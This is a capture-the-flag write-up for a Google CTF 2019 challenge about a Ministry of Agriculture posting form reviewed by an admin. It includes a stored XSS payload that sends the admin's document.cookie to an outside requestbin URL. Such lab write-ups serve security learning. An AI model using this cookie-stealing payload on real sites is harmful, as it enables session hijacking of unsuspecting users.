Google CTF 2019 // #04-1 Government Agriculture Network
Well it seems someone can’t keep their work life and their home life separate. You vaguely recall on your home planet, posters put up everywhere that said “Loose Zips sink large commercial properties with a responsibility to the shareholders.” You wonder if there is a similar concept here.
Using the credentials to access this so-called Agricultural network, you realize that SarahH was just hired as a vendor or contract worker and given access that was equivalent. You can only assume that Vendor/Contractor is the highest possible rank bestowed upon only the most revered and well regarded individuals of the land and expect information and access to flow like the Xenovian acid streams you used to bathe in as a child.
The portal picture displays that small very attractive individual whom you instantly form a bond with, despite not knowing. You must meet this entity! Converse and convince them you’re meant to be! After a brief amount of time the picture shifts into a biped presumably ingesting this creature! HOW DARE THEY. You have to save them, you have to stop this from happening. Get more information about this Gubberment thing and stop this atrocity.
You need to get in closer to save them – you beat on the window, but you need access to the cauliflower’s host to rescue it.
The URL above leads us to a Ministry of Agriculture page where we can post anything, to be reviewed by the administrator. Nothing else is clickable so we focus on the form.
Inspecting the form yielded no results, same for cookies.
Next step is to use a honeytoken. I made use of Canarytokens to generate a quick web bug and embedding the image URL generated into the form for submission.
Right after submitting the post, I got an email from canarytoken telling me the image was loaded. This means something or someone is looking at the submitted post. Next logical action is to try to steal the cookie of whatever or whoever is the admin.
<script> document.location='http://requestbin.net/r/YOUR_BIN?c=' + document.cookie; </script>
When the admin look at the post, this code will automatically send the entire cookie of the admin to our requestbin.
And sure enough, there’s our flag.